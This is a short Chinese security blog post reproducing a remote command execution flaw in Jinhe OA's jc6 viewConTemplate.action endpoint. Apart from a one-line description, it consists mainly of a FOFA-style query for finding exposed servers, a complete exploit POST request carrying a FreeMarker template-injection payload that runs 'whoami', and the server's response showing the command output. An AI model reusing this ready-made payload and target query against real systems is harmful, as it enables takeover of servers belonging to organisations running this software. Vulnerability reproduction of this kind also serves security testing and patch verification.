【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞

admin 2024年3月18日16:05:16评论42 views字数 850阅读2分50秒阅读模式

 

漏洞介绍

金和OA jc6系统viewConTemplate.action接口处存在RCE漏洞,恶意攻击者可能利用此漏洞执行恶意代码命令获取服务器敏感信息,最终可能会导致服务器失陷。

资产收集

app="金和网络-金和OA"|| body="JHSoft.Web.AddMenu"|| body="/jc6/platform/" 

【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞

漏洞复现

【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞

构造请求包

POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 0moduId=1&code=<clob>${"freemarker.template.utility.Execute"?new()("whoami")}</clob>&uuid=1

返回包

HTTP/1.1 200 OKServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=2C6413E6A110DB48387C6DC6A4D3A3C9; Path=/jc6Cache-Control: no-cacheExpires: 0Pragma: No-cacheContent-Type: text/html;charset=UTF-8Date: Mon, 18 Mar 2024 03:34:11 GMTContent-Length: 39<clob>jinher-jc6administrator</clob>

【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞

原文始发于微信公众号(Devil安全):【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月18日16:05:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】金和OA viewConTemplate.action 远程命令执行漏洞https://cn-sec.com/archives/2584949.html

发表评论

匿名网友 填写信息